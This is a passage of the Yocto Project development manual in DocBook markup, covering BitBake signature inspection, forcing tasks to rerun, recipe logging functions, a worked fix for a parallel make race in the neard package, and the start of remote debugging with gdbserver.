- task of the <filename>db</filename> recipe, the
- <filename>sigdata</filename> file might be found in the
- following location:
- <literallayout class='monospaced'>
- ${BUILDDIR}/tmp/stamps/i586-poky-linux/db/6.0.30-r1.do_fetch.sigdata.7c048c18222b16ff0bcee2000ef648b1
- </literallayout>
- For tasks that are accelerated through the shared state
- (<ulink url='&YOCTO_DOCS_OM_URL;#shared-state-cache'>sstate</ulink>)
- cache, an additional <filename>siginfo</filename> file
- is written into
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SSTATE_DIR'><filename>SSTATE_DIR</filename></ulink>
- along with the cached task output.
- The <filename>siginfo</filename> files contain exactly
- the same information as <filename>sigdata</filename>
- files.
- </para></listitem>
- <listitem><para>
- Run <filename>bitbake-dumpsig</filename> on the
- <filename>sigdata</filename> or
- <filename>siginfo</filename> file.
- Here is an example:
- <literallayout class='monospaced'>
- $ bitbake-dumpsig ${BUILDDIR}/tmp/stamps/i586-poky-linux/db/6.0.30-r1.do_fetch.sigdata.7c048c18222b16ff0bcee2000ef648b1
- </literallayout>
- In the output of the above command, you will find a
- line like the following, which lists all the (inferred)
- variable dependencies for the task.
- This list also includes indirect dependencies from
- variables depending on other variables, recursively.
- <literallayout class='monospaced'>
- Task dependencies: ['PV', 'SRCREV', 'SRC_URI', 'SRC_URI[md5sum]', 'SRC_URI[sha256sum]', 'base_do_fetch']
- </literallayout>
- <note>
- Functions (e.g. <filename>base_do_fetch</filename>)
- also count as variable dependencies.
- These functions in turn depend on the variables they
- reference.
- </note>
- The output of <filename>bitbake-dumpsig</filename> also
- includes the value each variable had, a list of
- dependencies for each variable, and
- <ulink url='&YOCTO_DOCS_BB_URL;#var-BB_HASHBASE_WHITELIST'><filename>BB_HASHBASE_WHITELIST</filename></ulink>
- information.
- </para></listitem>
- </orderedlist>
- </para>
-
- <para>
- There is also a <filename>bitbake-diffsigs</filename> command
- for comparing two <filename>siginfo</filename> or
- <filename>sigdata</filename> files.
- This command can be helpful when trying to figure out what
- changed between two versions of a task.
- If you call <filename>bitbake-diffsigs</filename> with just one
- file, the command behaves like
- <filename>bitbake-dumpsig</filename>.
- </para>
-
- <para>
- You can also use BitBake to dump out the signature construction
- information without executing tasks by using either of the
- following BitBake command-line options:
- <literallayout class='monospaced'>
- &dash;&dash;dump-signatures=<replaceable>SIGNATURE_HANDLER</replaceable>
- -S <replaceable>SIGNATURE_HANDLER</replaceable>
- </literallayout>
- <note>
- Two common values for
- <replaceable>SIGNATURE_HANDLER</replaceable> are "none" and
- "printdiff", which dump only the signature or compare the
- dumped signature with the cached one, respectively.
- </note>
- Using BitBake with either of these options causes BitBake to
- dump out <filename>sigdata</filename> files in the
- <filename>stamps</filename> directory for every task it would
- have executed instead of building the specified target package.
- </para>
- </section>
-
- <section id='dev-viewing-metadata-used-to-create-the-input-signature-of-a-shared-state-task'>
- <title>Viewing Metadata Used to Create the Input Signature of a Shared State Task</title>
-
- <para>
- Seeing what metadata went into creating the input signature
- of a shared state (sstate) task can be a useful debugging
- aid.
- This information is available in signature information
- (<filename>siginfo</filename>) files in
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SSTATE_DIR'><filename>SSTATE_DIR</filename></ulink>.
- For information on how to view and interpret information in
- <filename>siginfo</filename> files, see the
- "<link linkend='dev-viewing-task-variable-dependencies'>Viewing Task Variable Dependencies</link>"
- section.
- </para>
-
- <para>
- For conceptual information on shared state, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#shared-state'>Shared State</ulink>"
- section in the Yocto Project Overview and Concepts Manual.
- </para>
- </section>
-
- <section id='dev-invalidating-shared-state-to-force-a-task-to-run'>
- <title>Invalidating Shared State to Force a Task to Run</title>
-
- <para>
- The OpenEmbedded build system uses
- <ulink url='&YOCTO_DOCS_OM_URL;#overview-checksums'>checksums</ulink>
- and
- <ulink url='&YOCTO_DOCS_OM_URL;#shared-state'>shared state</ulink>
- cache to avoid unnecessarily rebuilding tasks.
- Collectively, this scheme is known as "shared state code."
- </para>
-
- <para>
- As with all schemes, this one has some drawbacks.
- It is possible that you could make implicit changes to your
- code that the checksum calculations do not take into
- account.
- These implicit changes affect a task's output but do not
- trigger the shared state code into rebuilding a recipe.
- Consider an example during which a tool changes its output.
- Assume that the output of <filename>rpmdeps</filename>
- changes.
- The result of the change should be that all the
- <filename>package</filename> and
- <filename>package_write_rpm</filename> shared state cache
- items become invalid.
- However, because the change to the output is
- external to the code and therefore implicit,
- the associated shared state cache items do not become
- invalidated.
- In this case, the build process uses the cached items
- rather than running the task again.
- Obviously, these types of implicit changes can cause
- problems.
- </para>
-
- <para>
- To avoid these problems during the build, you need to
- understand the effects of any changes you make.
- Realize that changes you make directly to a function
- are automatically factored into the checksum calculation.
- Thus, these explicit changes invalidate the associated
- area of shared state cache.
- However, you need to be aware of any implicit changes that
- are not obvious changes to the code and could affect
- the output of a given task.
- </para>
-
- <para>
- When you identify an implicit change, you can easily
- take steps to invalidate the cache and force the tasks
- to run.
- The steps you can take are as simple as changing a
- function's comments in the source code.
- For example, to invalidate package shared state files,
- change the comment statements of
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package'><filename>do_package</filename></ulink>
- or the comments of one of the functions it calls.
- Even though the change is purely cosmetic, it causes the
- checksum to be recalculated and forces the build system to
- run the task again.
- <note>
- For an example of a commit that makes a cosmetic
- change to invalidate shared state, see this
- <ulink url='&YOCTO_GIT_URL;/cgit.cgi/poky/commit/meta/classes/package.bbclass?id=737f8bbb4f27b4837047cb9b4fbfe01dfde36d54'>commit</ulink>.
- </note>
- </para>
- </section>
-
- <section id='dev-debugging-taskrunning'>
- <title>Running Specific Tasks</title>
-
- <para>
- Any given recipe consists of a set of tasks.
- The standard BitBake behavior in most cases is:
- <filename>do_fetch</filename>,
- <filename>do_unpack</filename>,
- <filename>do_patch</filename>,
- <filename>do_configure</filename>,
- <filename>do_compile</filename>,
- <filename>do_install</filename>,
- <filename>do_package</filename>,
- <filename>do_package_write_*</filename>, and
- <filename>do_build</filename>.
- The default task is <filename>do_build</filename> and any tasks
- on which it depends build first.
- Some tasks, such as <filename>do_devshell</filename>, are not
- part of the default build chain.
- If you wish to run a task that is not part of the default build
- chain, you can use the <filename>-c</filename> option in
- BitBake.
- Here is an example:
- <literallayout class='monospaced'>
- $ bitbake matchbox-desktop -c devshell
- </literallayout>
- </para>
-
- <para>
- The <filename>-c</filename> option respects task dependencies,
- which means that all other tasks (including tasks from other
- recipes) that the specified task depends on will be run before
- the task.
- Even when you manually specify a task to run with
- <filename>-c</filename>, BitBake will only run the task if it
- considers it "out of date".
- See the
- "<ulink url='&YOCTO_DOCS_OM_URL;#stamp-files-and-the-rerunning-of-tasks'>Stamp Files and the Rerunning of Tasks</ulink>"
- section in the Yocto Project Overview and Concepts Manual for
- how BitBake determines whether a task is "out of date".
- </para>
-
- <para>
- If you want to force an up-to-date task to be rerun (e.g.
- because you made manual modifications to the recipe's
- <ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink>
- that you want to try out), then you can use the
- <filename>-f</filename> option.
- <note>
- The reason <filename>-f</filename> is never required when
- running the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-devshell'><filename>do_devshell</filename></ulink>
- task is because the
- <filename>[</filename><ulink url='&YOCTO_DOCS_BB_URL;#variable-flags'><filename>nostamp</filename></ulink><filename>]</filename>
- variable flag is already set for the task.
- </note>
- The following example shows one way you can use the
- <filename>-f</filename> option:
- <literallayout class='monospaced'>
- $ bitbake matchbox-desktop
- .
- .
- make some changes to the source code in the work directory
- .
- .
- $ bitbake matchbox-desktop -c compile -f
- $ bitbake matchbox-desktop
- </literallayout>
- </para>
-
- <para>
- This sequence first builds and then recompiles
- <filename>matchbox-desktop</filename>.
- The last command reruns all tasks (basically the packaging
- tasks) after the compile.
- BitBake recognizes that the <filename>do_compile</filename>
- task was rerun and therefore understands that the other tasks
- also need to be run again.
- </para>
-
- <para>
- Another, shorter way to rerun a task and all
- <ulink url='&YOCTO_DOCS_REF_URL;#normal-recipe-build-tasks'>normal recipe build tasks</ulink>
- that depend on it is to use the <filename>-C</filename>
- option.
- <note>
- This option is upper-cased and is separate from the
- <filename>-c</filename> option, which is lower-cased.
- </note>
- Using this option invalidates the given task and then runs the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-build'><filename>do_build</filename></ulink>
- task, which is the default task if no task is given, and the
- tasks on which it depends.
- You could replace the final two commands in the previous example
- with the following single command:
- <literallayout class='monospaced'>
- $ bitbake matchbox-desktop -C compile
- </literallayout>
- Internally, the <filename>-f</filename> and
- <filename>-C</filename> options work by tainting (modifying) the
- input checksum of the specified task.
- This tainting indirectly causes the task and its
- dependent tasks to be rerun through the normal task dependency
- mechanisms.
- <note>
- BitBake explicitly keeps track of which tasks have been
- tainted in this fashion, and will print warnings such as the
- following for builds involving such tasks:
- <literallayout class='monospaced'>
- WARNING: /home/ulf/poky/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.1.bb.do_compile is tainted from a forced run
- </literallayout>
- The purpose of the warning is to let you know that the work
- directory and build output might not be in the clean state
- they would be in for a "normal" build, depending on what
- actions you took.
- To get rid of such warnings, you can remove the work
- directory and rebuild the recipe, as follows:
- <literallayout class='monospaced'>
- $ bitbake matchbox-desktop -c clean
- $ bitbake matchbox-desktop
- </literallayout>
- </note>
- </para>
-
- <para>
- You can view a list of tasks in a given package by running the
- <filename>do_listtasks</filename> task as follows:
- <literallayout class='monospaced'>
- $ bitbake matchbox-desktop -c listtasks
- </literallayout>
- The results appear as output to the console and are also in the
- file <filename>${WORKDIR}/temp/log.do_listtasks</filename>.
- </para>
- </section>
-
- <section id='dev-debugging-bitbake'>
- <title>General BitBake Problems</title>
-
- <para>
- You can see debug output from BitBake by using the
- <filename>-D</filename> option.
- The debug output gives more information about what BitBake
- is doing and the reason behind it.
- Each <filename>-D</filename> option you use increases the
- logging level.
- The most common usage is <filename>-DDD</filename>.
- </para>
-
- <para>
- The output from
- <filename>bitbake -DDD -v</filename> <replaceable>targetname</replaceable>
- can reveal why BitBake chose a certain version of a package or
- why BitBake picked a certain provider.
- This command could also help you in a situation where you think
- BitBake did something unexpected.
- </para>
- </section>
-
- <section id='dev-debugging-buildfile'>
- <title>Building with No Dependencies</title>
-
- <para>
- To build a specific recipe (<filename>.bb</filename> file),
- you can use the following command form:
- <literallayout class='monospaced'>
- $ bitbake -b <replaceable>somepath</replaceable>/<replaceable>somerecipe</replaceable>.bb
- </literallayout>
- This command form does not check for dependencies.
- Consequently, you should use it only when you know existing
- dependencies have been met.
- <note>
- You can also specify fragments of the filename.
- In this case, BitBake checks for a unique match.
- </note>
- </para>
- </section>
-
- <section id='recipe-logging-mechanisms'>
- <title>Recipe Logging Mechanisms</title>
-
- <para>
- The Yocto Project provides several logging functions for
- producing debugging output and reporting errors and warnings.
- For Python functions, the following logging functions exist.
- All of these functions log to
- <filename>${T}/log.do_</filename><replaceable>task</replaceable>,
- and can also log to standard output (stdout) with the right
- settings:
- <itemizedlist>
- <listitem><para>
- <filename>bb.plain(</filename><replaceable>msg</replaceable><filename>)</filename>:
- Writes <replaceable>msg</replaceable> as is to the
- log while also logging to stdout.
- </para></listitem>
- <listitem><para>
- <filename>bb.note(</filename><replaceable>msg</replaceable><filename>)</filename>:
- Writes "NOTE: <replaceable>msg</replaceable>" to the
- log.
- Also logs to stdout if BitBake is called with "-v".
- </para></listitem>
- <listitem><para>
- <filename>bb.debug(</filename><replaceable>level</replaceable><filename>,&nbsp;</filename><replaceable>msg</replaceable><filename>)</filename>:
- Writes "DEBUG: <replaceable>msg</replaceable>" to the
- log.
- Also logs to stdout if the log level is greater than or
- equal to <replaceable>level</replaceable>.
- See the
- "<ulink url='&YOCTO_DOCS_BB_URL;#usage-and-syntax'>-D</ulink>"
- option in the BitBake User Manual for more information.
- </para></listitem>
- <listitem><para>
- <filename>bb.warn(</filename><replaceable>msg</replaceable><filename>)</filename>:
- Writes "WARNING: <replaceable>msg</replaceable>" to the
- log while also logging to stdout.
- </para></listitem>
- <listitem><para>
- <filename>bb.error(</filename><replaceable>msg</replaceable><filename>)</filename>:
- Writes "ERROR: <replaceable>msg</replaceable>" to the
- log while also logging to standard out (stdout).
- <note>
- Calling this function does not cause the task to fail.
- </note>
- </para></listitem>
- <listitem><para>
- <filename>bb.fatal(</filename><replaceable>msg</replaceable><filename>)</filename>:
- This logging function is similar to
- <filename>bb.error(</filename><replaceable>msg</replaceable><filename>)</filename>
- but also causes the calling task to fail.
- <note>
- <filename>bb.fatal()</filename> raises an exception,
- which means you do not need to put a "return"
- statement after the function.
- </note>
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- The same logging functions are also available in shell
- functions, under the names
- <filename>bbplain</filename>, <filename>bbnote</filename>,
- <filename>bbdebug</filename>, <filename>bbwarn</filename>,
- <filename>bberror</filename>, and <filename>bbfatal</filename>.
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-logging'><filename>logging</filename></ulink>
- class implements these functions.
- See that class in the
- <filename>meta/classes</filename> folder of the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
- for information.
- </para>
-
- <section id='logging-with-python'>
- <title>Logging With Python</title>
-
- <para>
- When creating recipes using Python and inserting code that
- handles build logs, keep in mind the goal is to have
- informative logs while keeping the console as "silent" as
- possible.
- Also, if you want status messages in the log, use the
- "debug" loglevel.
- </para>
-
- <para>
- Following is an example written in Python.
- The code handles logging for a function that determines the
- number of tasks needed to be run.
- See the
- "<ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-listtasks'><filename>do_listtasks</filename></ulink>"
- section for additional information:
- <literallayout class='monospaced'>
- python do_listtasks() {
- bb.debug(2, "Starting to figure out the task list")
- if noteworthy_condition:
- bb.note("There are 47 tasks to run")
- bb.debug(2, "Got to point xyz")
- if warning_trigger:
- bb.warn("Detected warning_trigger, this might be a problem later.")
- if recoverable_error:
- bb.error("Hit recoverable_error, you really need to fix this!")
- if fatal_error:
- bb.fatal("fatal_error detected, unable to print the task list")
- bb.plain("The tasks present are abc")
- bb.debug(2, "Finished figuring out the tasklist")
- }
- </literallayout>
- </para>
- </section>
-
- <section id='logging-with-bash'>
- <title>Logging With Bash</title>
-
- <para>
- When creating recipes using Bash and inserting code that
- handles build logs, you have the same goals - informative
- with minimal console output.
- The syntax you use for recipes written in Bash is similar
- to that of recipes written in Python described in the
- previous section.
- </para>
-
- <para>
- Following is an example written in Bash.
- The code logs the progress of the <filename>do_my_function</filename> function.
- <literallayout class='monospaced'>
- do_my_function() {
- bbdebug 2 "Running do_my_function"
- if [ exceptional_condition ]; then
- bbnote "Hit exceptional_condition"
- fi
- bbdebug 2 "Got to point xyz"
- if [ warning_trigger ]; then
- bbwarn "Detected warning_trigger, this might cause a problem later."
- fi
- if [ recoverable_error ]; then
- bberror "Hit recoverable_error, correcting"
- fi
- if [ fatal_error ]; then
- bbfatal "fatal_error detected"
- fi
- bbdebug 2 "Completed do_my_function"
- }
- </literallayout>
- </para>
- </section>
- </section>
-
- <section id='debugging-parallel-make-races'>
- <title>Debugging Parallel Make Races</title>
-
- <para>
- A parallel <filename>make</filename> race occurs when the build
- consists of several parts that are run simultaneously and
- a situation occurs when the output or result of one
- part is not ready for use with a different part of the build
- that depends on that output.
- Parallel make races are annoying and can sometimes be difficult
- to reproduce and fix.
- However, some simple tips and tricks exist that can help
- you debug and fix them.
- This section presents a real-world example of an error
- encountered on the Yocto Project autobuilder and the process
- used to fix it.
- <note>
- If you cannot properly fix a <filename>make</filename> race
- condition, you can work around it by clearing either the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PARALLEL_MAKE'><filename>PARALLEL_MAKE</filename></ulink>
- or
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PARALLEL_MAKEINST'><filename>PARALLEL_MAKEINST</filename></ulink>
- variables.
- </note>
- </para>
-
- <section id='the-failure'>
- <title>The Failure</title>
-
- <para>
- For this example, assume that you are building an image that
- depends on the "neard" package.
- And, during the build, BitBake runs into problems and
- creates the following output.
- <note>
- This example log file has longer lines artificially
- broken to make the listing easier to read.
- </note>
- If you examine the output or the log file, you see the
- failure during <filename>make</filename>:
- <literallayout class='monospaced'>
- | DEBUG: SITE files ['endian-little', 'bit-32', 'ix86-common', 'common-linux', 'common-glibc', 'i586-linux', 'common']
- | DEBUG: Executing shell function do_compile
- | NOTE: make -j 16
- | make --no-print-directory all-am
- | /bin/mkdir -p include/near
- | /bin/mkdir -p include/near
- | /bin/mkdir -p include/near
- | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
- 0.14-r0/neard-0.14/include/types.h include/near/types.h
- | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
- 0.14-r0/neard-0.14/include/log.h include/near/log.h
- | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
- 0.14-r0/neard-0.14/include/plugin.h include/near/plugin.h
- | /bin/mkdir -p include/near
- | /bin/mkdir -p include/near
- | /bin/mkdir -p include/near
- | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
- 0.14-r0/neard-0.14/include/tag.h include/near/tag.h
- | /bin/mkdir -p include/near
- | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
- 0.14-r0/neard-0.14/include/adapter.h include/near/adapter.h
- | /bin/mkdir -p include/near
- | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
- 0.14-r0/neard-0.14/include/ndef.h include/near/ndef.h
- | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
- 0.14-r0/neard-0.14/include/tlv.h include/near/tlv.h
- | /bin/mkdir -p include/near
- | /bin/mkdir -p include/near
- | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
- 0.14-r0/neard-0.14/include/setting.h include/near/setting.h
- | /bin/mkdir -p include/near
- | /bin/mkdir -p include/near
- | /bin/mkdir -p include/near
- | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
- 0.14-r0/neard-0.14/include/device.h include/near/device.h
- | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
- 0.14-r0/neard-0.14/include/nfc_copy.h include/near/nfc_copy.h
- | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
- 0.14-r0/neard-0.14/include/snep.h include/near/snep.h
- | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
- 0.14-r0/neard-0.14/include/version.h include/near/version.h
- | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
- 0.14-r0/neard-0.14/include/dbus.h include/near/dbus.h
- | ./src/genbuiltin nfctype1 nfctype2 nfctype3 nfctype4 p2p > src/builtin.h
- | i586-poky-linux-gcc -m32 -march=i586 --sysroot=/home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/
- build/build/tmp/sysroots/qemux86 -DHAVE_CONFIG_H -I. -I./include -I./src -I./gdbus -I/home/pokybuild/
- yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/sysroots/qemux86/usr/include/glib-2.0
- -I/home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/sysroots/qemux86/usr/
- lib/glib-2.0/include -I/home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/
- tmp/sysroots/qemux86/usr/include/dbus-1.0 -I/home/pokybuild/yocto-autobuilder/yocto-slave/
- nightly-x86/build/build/tmp/sysroots/qemux86/usr/lib/dbus-1.0/include -I/home/pokybuild/yocto-autobuilder/
- yocto-slave/nightly-x86/build/build/tmp/sysroots/qemux86/usr/include/libnl3
- -DNEAR_PLUGIN_BUILTIN -DPLUGINDIR=\""/usr/lib/near/plugins"\"
- -DCONFIGDIR=\""/etc/neard\"" -O2 -pipe -g -feliminate-unused-debug-types -c
- -o tools/snep-send.o tools/snep-send.c
- | In file included from tools/snep-send.c:16:0:
- | tools/../src/near.h:41:23: fatal error: near/dbus.h: No such file or directory
- | #include &lt;near/dbus.h&gt;
- | ^
- | compilation terminated.
- | make[1]: *** [tools/snep-send.o] Error 1
- | make[1]: *** Waiting for unfinished jobs....
- | make: *** [all] Error 2
- | ERROR: oe_runmake failed
- </literallayout>
- </para>
- </section>
-
- <section id='reproducing-the-error'>
- <title>Reproducing the Error</title>
-
- <para>
- Because race conditions are intermittent, they do not
- manifest themselves every time you do the build.
- In fact, most times the build will complete without problems
- even though the potential race condition exists.
- Thus, once the error surfaces, you need a way to reproduce
- it.
- </para>
-
- <para>
- In this example, compiling the "neard" package is causing
- the problem.
- So the first thing to do is build "neard" locally.
- Before you start the build, set the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PARALLEL_MAKE'><filename>PARALLEL_MAKE</filename></ulink>
- variable in your <filename>local.conf</filename> file to
- a high number (e.g. "-j 20").
- Using a high value for <filename>PARALLEL_MAKE</filename>
- increases the chances of the race condition showing up:
- <literallayout class='monospaced'>
- $ bitbake neard
- </literallayout>
- </para>
-
- <para>
- Once the local build for "neard" completes, start a
- <filename>devshell</filename> build:
- <literallayout class='monospaced'>
- $ bitbake neard -c devshell
- </literallayout>
- For information on how to use a
- <filename>devshell</filename>, see the
- "<link linkend='platdev-appdev-devshell'>Using a Development Shell</link>"
- section.
- </para>
-
- <para>
- In the <filename>devshell</filename>, do the following:
- <literallayout class='monospaced'>
- $ make clean
- $ make tools/snep-send.o
- </literallayout>
- The <filename>devshell</filename> commands cause the failure
- to clearly be visible.
- In this case, a missing dependency exists for the "neard"
- Makefile target.
- Here is some abbreviated, sample output with the
- missing dependency clearly visible at the end:
- <literallayout class='monospaced'>
- i586-poky-linux-gcc -m32 -march=i586 --sysroot=/home/scott-lenovo/......
- .
- .
- .
- tools/snep-send.c
- In file included from tools/snep-send.c:16:0:
- tools/../src/near.h:41:23: fatal error: near/dbus.h: No such file or directory
- #include &lt;near/dbus.h&gt;
- ^
- compilation terminated.
- make: *** [tools/snep-send.o] Error 1
- $
- </literallayout>
- </para>
- </section>
-
- <section id='creating-a-patch-for-the-fix'>
- <title>Creating a Patch for the Fix</title>
-
- <para>
- Because there is a missing dependency for the Makefile
- target, you need to patch the
- <filename>Makefile.am</filename> file, which is generated
- from <filename>Makefile.in</filename>.
- You can use Quilt to create the patch:
- <literallayout class='monospaced'>
- $ quilt new parallelmake.patch
- Patch patches/parallelmake.patch is now on top
- $ quilt add Makefile.am
- File Makefile.am added to patch patches/parallelmake.patch
- </literallayout>
- For more information on using Quilt, see the
- "<link linkend='using-a-quilt-workflow'>Using Quilt in Your Workflow</link>"
- section.
- </para>
-
- <para>
- At this point you need to make the edits to
- <filename>Makefile.am</filename> to add the missing
- dependency.
- For our example, you have to add the following line
- to the file:
- <literallayout class='monospaced'>
- tools/snep-send.$(OBJEXT): include/near/dbus.h
- </literallayout>
- </para>
-
- <para>
- Once you have edited the file, use the
- <filename>refresh</filename> command to create the patch:
- <literallayout class='monospaced'>
- $ quilt refresh
- Refreshed patch patches/parallelmake.patch
- </literallayout>
- Once the patch file exists, you need to add it back to the
- originating recipe folder.
- Here is an example assuming a top-level
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
- named <filename>poky</filename>:
- <literallayout class='monospaced'>
- $ cp patches/parallelmake.patch poky/meta/recipes-connectivity/neard/neard
- </literallayout>
- The final thing you need to do to implement the fix in the
- build is to update the "neard" recipe (i.e.
- <filename>neard-0.14.bb</filename>) so that the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
- statement includes the patch file.
- The recipe file is in the folder above the patch.
- Here is what the edited <filename>SRC_URI</filename>
- statement would look like:
- <literallayout class='monospaced'>
- SRC_URI = "${KERNELORG_MIRROR}/linux/network/nfc/${BPN}-${PV}.tar.xz \
- file://neard.in \
- file://neard.service.in \
- file://parallelmake.patch \
- "
- </literallayout>
- </para>
-
- <para>
- With the patch complete and moved to the correct folder and
- the <filename>SRC_URI</filename> statement updated, you can
- exit the <filename>devshell</filename>:
- <literallayout class='monospaced'>
- $ exit
- </literallayout>
- </para>
- </section>
-
- <section id='testing-the-build'>
- <title>Testing the Build</title>
-
- <para>
- With everything in place, you can get back to trying the
- build again locally:
- <literallayout class='monospaced'>
- $ bitbake neard
- </literallayout>
- This build should succeed.
- </para>
-
- <para>
- Now you can open up a <filename>devshell</filename> again
- and repeat the clean and make operations as follows:
- <literallayout class='monospaced'>
- $ bitbake neard -c devshell
- $ make clean
- $ make tools/snep-send.o
- </literallayout>
- The build should work without issue.
- </para>
-
- <para>
- As with all solved problems, if they originated upstream,
- you need to submit the fix for the recipe in OE-Core and
- upstream so that the problem is taken care of at its
- source.
- See the
- "<link linkend='how-to-submit-a-change'>Submitting a Change to the Yocto Project</link>"
- section for more information.
- </para>
- </section>
- </section>
-
- <section id="platdev-gdb-remotedebug">
- <title>Debugging With the GNU Project Debugger (GDB) Remotely</title>
-
- <para>
- GDB allows you to examine running programs, which in turn helps
- you to understand and fix problems.
- It also allows you to perform post-mortem style analysis of
- program crashes.
- GDB is available as a package within the Yocto Project and is
- installed in SDK images by default.
- See the
- "<ulink url='&YOCTO_DOCS_REF_URL;#ref-images'>Images</ulink>"
- chapter in the Yocto Project Reference Manual for a description of
- these images.
- You can find information on GDB at
- <ulink url="http://sourceware.org/gdb/"/>.
- <note><title>Tip</title>
- For best results, install debug (<filename>-dbg</filename>)
- packages for the applications you are going to debug.
- Doing so makes extra debug symbols available that give you
- more meaningful output.
- </note>
- </para>
-
- <para>
- Sometimes, due to memory or disk space constraints, it is not
- possible to use GDB directly on the remote target to debug
- applications.
- These constraints arise because GDB needs to load the debugging
- information and the binaries of the process being debugged.
- Additionally, GDB needs to perform many computations to locate
- information such as function names, variable names and values,
- stack traces and so forth - even before starting the debugging
- process.
- These extra computations place more load on the target system
- and can alter the characteristics of the program being debugged.
- </para>
-
- <para>
- To help get past the previously mentioned constraints, you can
- use gdbserver, which runs on the remote target and does not
- load any debugging information from the debugged process.
- Instead, a GDB instance processes the debugging information that
- is run on a remote computer - the host GDB.
- The host GDB then sends control commands to gdbserver to make
- it stop or start the debugged program, as well as read or write
- memory regions of that debugged program.
- All the debugging information loaded and processed as well
- as all the heavy debugging is done by the host GDB.
- Offloading these processes gives the gdbserver running on the
- target a chance to remain small and fast.
- </para>
-
- <para>
- Because the host GDB is responsible for loading the debugging
- information and for doing the necessary processing to make
- actual debugging happen, you have to make sure the host can
- access the unstripped binaries complete with their debugging
- information and also be sure the target is compiled with no
- optimizations.
- The host GDB must also have local access to all the libraries
- used by the debugged program.
- Because gdbserver does not need any local debugging information,
- the binaries on the remote target can remain stripped.
- However, the binaries must also be compiled without optimization
- so they match the host's binaries.
- </para>
-
- <para>
- To remain consistent with GDB documentation and terminology,
- the binary being debugged on the remote target machine is
- referred to as the "inferior" binary.
- For documentation on GDB see the
- <ulink url="http://sourceware.org/gdb/documentation/">GDB site</ulink>.
- </para>
-
- <para>
- The following steps show you how to debug using the GNU project
- debugger.
- <orderedlist>
- <listitem><para>
- <emphasis>Configure your build system to construct the
- companion debug filesystem:</emphasis></para>
-
- <para>In your <filename>local.conf</filename> file, set
- the following:
- <literallayout class='monospaced'>
- IMAGE_GEN_DEBUGFS = "1"
- IMAGE_FSTYPES_DEBUGFS = "tar.bz2"
- </literallayout>
- These options cause the OpenEmbedded build system
- to generate a special companion filesystem fragment,
- which contains the matching source and debug symbols to
- your deployable filesystem.
- The build system does this by looking at what is in the
- deployed filesystem, and pulling the corresponding
- <filename>-dbg</filename> packages.</para>
-
- <para>The companion debug filesystem is not a complete
- filesystem, but only contains the debug fragments.
- This filesystem must be combined with the full filesystem
- for debugging.
- Subsequent steps in this procedure show how to combine
- the partial filesystem with the full filesystem.
- </para></listitem>
- <listitem><para>
- <emphasis>Configure the system to include gdbserver in
- the target filesystem:</emphasis></para>
-
- <para>Make the following addition in either your
- <filename>local.conf</filename> file or in an image
- recipe:
- <literallayout class='monospaced'>
- IMAGE_INSTALL_append = “ gdbserver"
- </literallayout>
- The change makes sure the <filename>gdbserver</filename>
- package is included.
- </para></listitem>
- <listitem><para>
- <emphasis>Build the environment:</emphasis></para>
-
- <para>Use the following command to construct the image
- and the companion Debug Filesystem:
- <literallayout class='monospaced'>
- $ bitbake <replaceable>image</replaceable>
- </literallayout>
- Build the cross GDB component and make it available
- for debugging.
- Build the SDK that matches the image.
- Building the SDK is best for a production build
- that can be used later for debugging, especially
- during long term maintenance:
- <literallayout class='monospaced'>
- $ bitbake -c populate_sdk <replaceable>image</replaceable>
- </literallayout></para>
-
- <para>Alternatively, you can build the minimal
- toolchain components that match the target.
- Doing so creates a smaller than typical SDK and only
- contains a minimal set of components with which to
- build simple test applications, as well as run the
- debugger:
- <literallayout class='monospaced'>
- $ bitbake meta-toolchain
- </literallayout></para>
-
- <para>A final method is to build Gdb itself within
- the build system:
- <literallayout class='monospaced'>
- $ bitbake gdb-cross-<replaceable>architecture</replaceable>
- </literallayout>
- Doing so produces a temporary copy of
